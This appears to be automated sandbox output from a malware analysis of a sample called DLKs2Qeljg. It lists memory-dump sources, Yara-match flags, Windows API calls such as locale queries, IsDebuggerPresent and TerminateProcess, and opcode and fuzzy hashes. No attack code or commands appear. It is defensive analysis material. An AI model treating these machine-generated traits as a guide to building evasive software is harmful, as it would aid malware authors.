                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InfoLocale
                                                                                                        • String ID: ACP$OCP
                                                                                                        • API String ID: 2299586839-711371036
                                                                                                        • Opcode ID: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                                                                        • Instruction ID: 1b44de1f7026d878333f9870d974062101081d782898e535d61b674f6735b06a
                                                                                                        • Opcode Fuzzy Hash: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                                                                        • Instruction Fuzzy Hash: 0821CB75A00105A6D7349F14C901BA773AAEF9CF60F569466EA09D7310E736DD41C3D8
                                                                                                        APIs
                                                                                                        • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0215BCE4,?,00000000), ref: 0215BA5E
                                                                                                        • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0215BCE4,?,00000000), ref: 0215BA87
                                                                                                        • GetACP.KERNEL32(?,?,0215BCE4,?,00000000), ref: 0215BA9C
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4149339317.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DLKs2Qeljg.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: InfoLocale
                                                                                                        • String ID: ACP$OCP
                                                                                                        • API String ID: 2299586839-711371036
                                                                                                        • Opcode ID: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                                                                        • Instruction ID: 89b2b482ce1ffd70bdeeae5b188cb6875bfd12a89bed7134b16961c778a84679
                                                                                                        • Opcode Fuzzy Hash: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                                                                        • Instruction Fuzzy Hash: DF21B332A88125EAD7348F55D901BA773A6EB80E5CB5784A4FD2AD7118FB32DF40C350
                                                                                                        APIs
                                                                                                          • Part of subcall function 00431ECA: GetLastError.KERNEL32(?,?,0042DFD5,00457910,00000010), ref: 00431ECE
                                                                                                          • Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F01
                                                                                                          • Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F42
                                                                                                          • Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F29
                                                                                                          • Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F36
                                                                                                        • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0043BA3E
                                                                                                        • IsValidCodePage.KERNEL32(00000000), ref: 0043BA99
                                                                                                        • IsValidLocale.KERNEL32(?,00000001), ref: 0043BAA8
                                                                                                        • GetLocaleInfoW.KERNEL32(?,00001001,004307A5,00000040,?,004308C5,00000055,00000000,?,?,00000055,00000000), ref: 0043BAF0
                                                                                                        • GetLocaleInfoW.KERNEL32(?,00001002,00430825,00000040), ref: 0043BB0F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser
                                                                                                        • String ID:
                                                                                                        • API String ID: 2287132625-0
                                                                                                        • Opcode ID: 38d8fd1994316528ab50ff09970b315fc0b2a3ba84deb6354b1998d5a23f6b58
                                                                                                        • Instruction ID: e5497ab5c31cc8eb6cce8c5579f1d7db95bd29b644ec7623244df27cb8a16c00
                                                                                                        • Opcode Fuzzy Hash: 38d8fd1994316528ab50ff09970b315fc0b2a3ba84deb6354b1998d5a23f6b58
                                                                                                        • Instruction Fuzzy Hash: E25173719006099BDB10EFA5DC45BBF73B8FF4C700F14556BEA14E7290EB789A048BA9
                                                                                                        APIs
                                                                                                          • Part of subcall function 02152131: GetLastError.KERNEL32(?,?,0214A9DC,?,00000000,?,0214CDD6,02122474,00000000,?,00451F20), ref: 02152135
                                                                                                          • Part of subcall function 02152131: _free.LIBCMT ref: 02152168
                                                                                                          • Part of subcall function 02152131: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021521A9
                                                                                                          • Part of subcall function 02152131: _free.LIBCMT ref: 02152190
                                                                                                          • Part of subcall function 02152131: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 0215219D
                                                                                                        • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0215BCA5
                                                                                                        • IsValidCodePage.KERNEL32(00000000), ref: 0215BD00
                                                                                                        • IsValidLocale.KERNEL32(?,00000001), ref: 0215BD0F
                                                                                                        • GetLocaleInfoW.KERNEL32(?,00001001,02150A0C,00000040,?,02150B2C,00000055,00000000,?,?,00000055,00000000), ref: 0215BD57
                                                                                                        • GetLocaleInfoW.KERNEL32(?,00001002,02150A8C,00000040), ref: 0215BD76
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4149339317.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DLKs2Qeljg.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser
                                                                                                        • String ID:
                                                                                                        • API String ID: 2287132625-0
                                                                                                        • Opcode ID: 119725e359bc42e0bfb9cdb5970e3de8a9f9b5c3b1583b7d82a4707c3220fec3
                                                                                                        • Instruction ID: a2cad42a7b230c7f690858400dc88d20b3bc5edeb7b2f7673e553d2368b583f7
                                                                                                        • Opcode Fuzzy Hash: 119725e359bc42e0bfb9cdb5970e3de8a9f9b5c3b1583b7d82a4707c3220fec3
                                                                                                        • Instruction Fuzzy Hash: 89518071944229EEDB20DFA5CC40ABEB3B9FF05708F4444A9ED20EB154EB719B01CBA5
                                                                                                        APIs
                                                                                                          • Part of subcall function 00431ECA: GetLastError.KERNEL32(?,?,0042DFD5,00457910,00000010), ref: 00431ECE
                                                                                                          • Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F01
                                                                                                          • Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F42
                                                                                                        • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,004307AC,?,?,?,?,00430203,?,00000004), ref: 0043B0DC
                                                                                                        • _wcschr.LIBVCRUNTIME ref: 0043B16C
                                                                                                        • _wcschr.LIBVCRUNTIME ref: 0043B17A
                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,004307AC,00000000,004308CC), ref: 0043B21D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_free
                                                                                                        • String ID:
                                                                                                        • API String ID: 2444527052-0
                                                                                                        • Opcode ID: 7ed3a86c29a382af421c1474aa1bc1332d6e23e5dd750d7bbc09ab77345b00e1
                                                                                                        • Instruction ID: 0696757347486699991afdae1c367ad9a815ca2b39bc809b388401715a4d6b3e
                                                                                                        • Opcode Fuzzy Hash: 7ed3a86c29a382af421c1474aa1bc1332d6e23e5dd750d7bbc09ab77345b00e1
                                                                                                        • Instruction Fuzzy Hash: D1611871600206AADB24AB75DC46BBB73A8EF0D340F14146FFA15D7281EB7CE95087E9
                                                                                                        APIs
                                                                                                          • Part of subcall function 02152131: GetLastError.KERNEL32(?,?,0214A9DC,?,00000000,?,0214CDD6,02122474,00000000,?,00451F20), ref: 02152135
                                                                                                          • Part of subcall function 02152131: _free.LIBCMT ref: 02152168
                                                                                                          • Part of subcall function 02152131: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021521A9
                                                                                                        • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,02150A13,?,?,?,?,0215046A,?,00000004), ref: 0215B343
                                                                                                        • _wcschr.LIBVCRUNTIME ref: 0215B3D3
                                                                                                        • _wcschr.LIBVCRUNTIME ref: 0215B3E1
                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,02150A13,00000000,02150B33), ref: 0215B484
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4149339317.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DLKs2Qeljg.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_free
                                                                                                        • String ID:
                                                                                                        • API String ID: 2444527052-0
                                                                                                        • Opcode ID: a8d3268dc8615bf56593139fe4b4cdd8dd771f7aacb6be947116ef161c46c3e3
                                                                                                        • Instruction ID: 57dbf78d038d740d22f40d6c5b34dd18a3ec27847e5c7d0199babbcfd57dd407
                                                                                                        • Opcode Fuzzy Hash: a8d3268dc8615bf56593139fe4b4cdd8dd771f7aacb6be947116ef161c46c3e3
                                                                                                        • Instruction Fuzzy Hash: 5361D671A84326EED724AF65CC41BAB73A9EF05718F1440BAED25D7184EB74E600CBA0
                                                                                                        APIs
                                                                                                          • Part of subcall function 00431ECA: GetLastError.KERNEL32(?,?,0042DFD5,00457910,00000010), ref: 00431ECE
                                                                                                          • Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F01
                                                                                                          • Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F42
                                                                                                          • Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F29
                                                                                                          • Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F36
                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B439
                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B48A
                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B54A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorInfoLastLocale$_free
                                                                                                        • String ID:
                                                                                                        • API String ID: 2834031935-0
                                                                                                        • Opcode ID: 9404b068eb5bdeb4a2642777d5b5abf2665715f9f507ca32c902d1d9e066e0b2
                                                                                                        • Instruction ID: f1e76511527bd8b46bed2dc81967877e1a53036e4ad42a1ad25ba8e4a7fcb861
                                                                                                        • Opcode Fuzzy Hash: 9404b068eb5bdeb4a2642777d5b5abf2665715f9f507ca32c902d1d9e066e0b2
                                                                                                        • Instruction Fuzzy Hash: 2461A571500207ABEF289F25CC82BBA77A8EF08318F10507BEE15C6681E73DD951CB99
                                                                                                        APIs
                                                                                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0042A4BB
                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0042A4C5
                                                                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 0042A4D2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                        • String ID:
                                                                                                        • API String ID: 3906539128-0
                                                                                                        • Opcode ID: 815768619075a8870a7dbdefa306677595f55cc39088b32ded2df8e6e8af0d4d
                                                                                                        • Instruction ID: 026f9f506817a9816d6037b847677398505f2b74d93b69b13e61bf99ecfd2c2c
                                                                                                        • Opcode Fuzzy Hash: 815768619075a8870a7dbdefa306677595f55cc39088b32ded2df8e6e8af0d4d
                                                                                                        • Instruction Fuzzy Hash: BC31D8749012289BCB21DF24D9887CDBBB4AF08711F5041EAE81CA7250EB749F958F49
                                                                                                        APIs
                                                                                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,0212DACD), ref: 0214A722
                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0212DACD), ref: 0214A72C
                                                                                                        • UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,0212DACD), ref: 0214A739
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4149339317.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DLKs2Qeljg.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                        • String ID:
                                                                                                        • API String ID: 3906539128-0
                                                                                                        • Opcode ID: eb826f4c1f6c2a36f22102285c1cba4b775e3ea8ac7ebf58b950a08133c1f654
                                                                                                        • Instruction ID: 5f8c6b68d51806b181cc2ea0f480445ad2ea4abca88b64f21cf15a7777d4e404
                                                                                                        • Opcode Fuzzy Hash: eb826f4c1f6c2a36f22102285c1cba4b775e3ea8ac7ebf58b950a08133c1f654
                                                                                                        • Instruction Fuzzy Hash: AA31D67494122C9BCB21DF64DD88B9CBBB8BF08711F5041EAE40CA7250EB309B858F44
                                                                                                        APIs
                                                                                                        • GetCurrentProcess.KERNEL32(00000003,?,0042FE25,00000003,00457970,0000000C,0042FF7C,00000003,00000002,00000000,?,0042DFAF,00000003), ref: 0042FE70
                                                                                                        • TerminateProcess.KERNEL32(00000000,?,0042FE25,00000003,00457970,0000000C,0042FF7C,00000003,00000002,00000000,?,0042DFAF,00000003), ref: 0042FE77
                                                                                                        • ExitProcess.KERNEL32 ref: 0042FE89
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Process$CurrentExitTerminate
                                                                                                        • String ID:
                                                                                                        • API String ID: 1703294689-0
                                                                                                        • Opcode ID: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                                                                        • Instruction ID: cbe936bc43631a6ebab221667e08f429fe6a913ec22d428f2decb57a07c45d03
                                                                                                        • Opcode Fuzzy Hash: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                                                                        • Instruction Fuzzy Hash: F9E08C31100548AFCF126F60ED09A5A3B39FF11B86F850479F8068B276CB39EE42CB48
                                                                                                        APIs
                                                                                                        • GetCurrentProcess.KERNEL32(00000000,?,0215008C,00000000,00457970,0000000C,021501E3,00000000,00000002,00000000), ref: 021500D7
                                                                                                        • TerminateProcess.KERNEL32(00000000,?,0215008C,00000000,00457970,0000000C,021501E3,00000000,00000002,00000000), ref: 021500DE
                                                                                                        • ExitProcess.KERNEL32 ref: 021500F0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4149339317.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DLKs2Qeljg.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Process$CurrentExitTerminate
                                                                                                        • String ID:
                                                                                                        • API String ID: 1703294689-0
                                                                                                        • Opcode ID: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                                                                        • Instruction ID: ecf851e36da66422be040dee545c64fe690e440a66df5d762a35e68558636245
                                                                                                        • Opcode Fuzzy Hash: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                                                                        • Instruction Fuzzy Hash: 67E0EC35040258EFCF116FA4DD48A597B6AFF49B86F4040A4FE159B131CB36DE42CB84
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4149339317.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DLKs2Qeljg.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: .$GetProcAddress.$l
                                                                                                        • API String ID: 0-2784972518
                                                                                                        • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                        • Instruction ID: c47a0ca15b32ba9ed95b3f1139f05f2783e18e5976a0671db0a234a546f7024c
                                                                                                        • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                        • Instruction Fuzzy Hash: F23169B6901619CFDB10CF99C880AAEBBF5FF18324F15414AE445B7210D771EA59CFA4
                                                                                                        APIs
                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,00430203,?,00000004), ref: 00435203
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InfoLocale
                                                                                                        • String ID: GetLocaleInfoEx
                                                                                                        • API String ID: 2299586839-2904428671
                                                                                                        • Opcode ID: cb6fe6aba531d19615e9b09a8e77e06eed824ebb7129d9e125764b32f0a2e06d
                                                                                                        • Instruction ID: 77d2a6705551c22c9c4f0428a2f6e8a78b6e695a94441c88a724e02477ae1ec3
                                                                                                        • Opcode Fuzzy Hash: cb6fe6aba531d19615e9b09a8e77e06eed824ebb7129d9e125764b32f0a2e06d
                                                                                                        • Instruction Fuzzy Hash: C3F09631A81318BBDF116F51DC02FAE7B65EF18B12F10416AFC0567290DA769920AA9D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 47af0fffafc6034098a66fb6813f004731177b6d1efb7719fab4c4e099b30d71
                                                                                                        • Instruction ID: 3e9e42cc23dfcbd4fdb8553ee609b72eaaad40ee2fbbc40375509bb09f17fb16
                                                                                                        • Opcode Fuzzy Hash: 47af0fffafc6034098a66fb6813f004731177b6d1efb7719fab4c4e099b30d71
                                                                                                        • Instruction Fuzzy Hash: 2B024D71E002299BDF14CFAAD9806AEFBF1EF48314F55416AD919E7340D734AD41CB94
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4149339317.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DLKs2Qeljg.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: c91f95ec68f77aac8bd11e5e0ea726c20680edc7db15408a80b56bc1815cf2ba
                                                                                                        • Instruction ID: e7657520508435c33e25770bc04bde293aafe296e138b5f76617bf92af09e341
                                                                                                        • Opcode Fuzzy Hash: c91f95ec68f77aac8bd11e5e0ea726c20680edc7db15408a80b56bc1815cf2ba
                                                                                                        • Instruction Fuzzy Hash: 4E021C71E402199FDF14CFA9C8906ADB7F2FF88714F25826AD919E7344DB31A942CB90
                                                                                                        APIs
                                                                                                        • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 02122622
                                                                                                        • PostQuitMessage.USER32(00000000), ref: 021227C0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4149339317.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DLKs2Qeljg.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: MessageNtdllPostProc_QuitWindow
                                                                                                        • String ID:
                                                                                                        • API String ID: 4264772764-0
                                                                                                        • Opcode ID: d57fbe59a329fb309be7fe1269fcb85092641ffb4e542ab0082b7c0a7099a69f
                                                                                                        • Instruction ID: 2b672fa5ebd37dd34eb58d0bfe337276d2343b01b2545a1dae0ca21efc168c9c
                                                                                                        • Opcode Fuzzy Hash: d57fbe59a329fb309be7fe1269fcb85092641ffb4e542ab0082b7c0a7099a69f
                                                                                                        • Instruction Fuzzy Hash: E941FD25964384A9E730EFA5BC45B2533B0FF64722F10652BE528CB2B2E3B28554C75E
                                                                                                        APIs
                                                                                                        • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00436CAA,?,?,00000008,?,?,0043F16B,00000000), ref: 00436EDC
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ExceptionRaise
                                                                                                        • String ID:
                                                                                                        • API String ID: 3997070919-0
                                                                                                        • Opcode ID: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                                                                        • Instruction ID: 4bead90866a6a8306652f63e3edf2d2e70f9049ab2994a866b46465668e927e2
                                                                                                        • Opcode Fuzzy Hash: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                                                                        • Instruction Fuzzy Hash: 13B15D35210609EFD715CF28C48AB657BE0FF09364F26D659E899CF2A1C339E992CB44
                                                                                                        APIs
                                                                                                        • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,02156F11,?,?,00000008,?,?,0215F3D2,00000000), ref: 02157143
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4149339317.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DLKs2Qeljg.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ExceptionRaise
                                                                                                        • String ID:
                                                                                                        • API String ID: 3997070919-0
                                                                                                        • Opcode ID: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                                                                        • Instruction ID: 599a10e44d38d673eda07bf645c02fdca394f3067657d67ac8b58c38d4ff78ae
                                                                                                        • Opcode Fuzzy Hash: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                                                                        • Instruction Fuzzy Hash: 42B12B31550618DFD719CF28C486B65BBE1FF45368F258698E8A9CF2E1C335E992CB40
                                                                                                        APIs
                                                                                                          • Part of subcall function 00431ECA: GetLastError.KERNEL32(?,?,0042DFD5,00457910,00000010), ref: 00431ECE
                                                                                                          • Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F01
                                                                                                          • Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F42
                                                                                                          • Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F29
                                                                                                          • Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F36
                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B689
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast$_free$InfoLocale
                                                                                                        • String ID:
                                                                                                        • API String ID: 2955987475-0
                                                                                                        • Opcode ID: 76bdead3310ffb9b1966938f0108c5245838f754ae1b95c719928bdd6cdfccfe
                                                                                                        • Instruction ID: 4c7343574116d105162f1c568ba8aea657e897f65ebfc7aca9760b93b0bda93a
                                                                                                        • Opcode Fuzzy Hash: 76bdead3310ffb9b1966938f0108c5245838f754ae1b95c719928bdd6cdfccfe
                                                                                                        • Instruction Fuzzy Hash: AA21863251020A9BDB249E26DC46BBB73A8EB48315F10117FFE01D6242EB79DD45CB99
                                                                                                        APIs
                                                                                                          • Part of subcall function 02152131: GetLastError.KERNEL32(?,?,0214A9DC,?,00000000,?,0214CDD6,02122474,00000000,?,00451F20), ref: 02152135
                                                                                                          • Part of subcall function 02152131: _free.LIBCMT ref: 02152168
                                                                                                          • Part of subcall function 02152131: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021521A9
                                                                                                          • Part of subcall function 02152131: _free.LIBCMT ref: 02152190
                                                                                                          • Part of subcall function 02152131: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 0215219D
                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0215B8F0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4149339317.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DLKs2Qeljg.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast$_free$InfoLocale
                                                                                                        • String ID:
                                                                                                        • API String ID: 2955987475-0
                                                                                                        • Opcode ID: 8d1e0dff99db69fa77e1a690083a2ab2b0404bead7d8da99940a9befd189831e
                                                                                                        • Instruction ID: 335124e3aa627bd100d1cdd4e895ccfcec5e79871d4311c45440b63ed8a8c938
                                                                                                        • Opcode Fuzzy Hash: 8d1e0dff99db69fa77e1a690083a2ab2b0404bead7d8da99940a9befd189831e
                                                                                                        • Instruction Fuzzy Hash: D4219872594226DFDF249F24DC81B7A73ADEF44715F1001FAED11D6184E7399A44CB50
                                                                                                        APIs
                                                                                                          • Part of subcall function 00431ECA: GetLastError.KERNEL32(?,?,0042DFD5,00457910,00000010), ref: 00431ECE
                                                                                                          • Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F01
                                                                                                          • Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F42
                                                                                                        • EnumSystemLocalesW.KERNEL32(0043B3E5,00000001,00000000,?,004307A5,?,0043BA12,00000000,?,?,?), ref: 0043B32F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                                        • String ID:
                                                                                                        • API String ID: 2016158738-0
                                                                                                        • Opcode ID: 9dfe4f960725340af2dbd28f6025354d562524789b7736a7d15e08a761a9ce4d
                                                                                                        • Instruction ID: 9dc9256a404de3575a93206041da1aaaa21de42e5a9a86f68168da1acedf184b
                                                                                                        • Opcode Fuzzy Hash: 9dfe4f960725340af2dbd28f6025354d562524789b7736a7d15e08a761a9ce4d
                                                                                                        • Instruction Fuzzy Hash: 6E1129372007019FDB189F39C89577BB791FF88318F15452EEA8687B40E3756902C784
                                                                                                        APIs
                                                                                                          • Part of subcall function 02152131: GetLastError.KERNEL32(?,?,0214A9DC,?,00000000,?,0214CDD6,02122474,00000000,?,00451F20), ref: 02152135
                                                                                                          • Part of subcall function 02152131: _free.LIBCMT ref: 02152168
                                                                                                          • Part of subcall function 02152131: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021521A9
                                                                                                        • EnumSystemLocalesW.KERNEL32(0043B3E5,00000001,00000000,?,02150A0C,?,0215BC79,00000000,?,?,?), ref: 0215B596
                                                                                                        Memory Dump Source
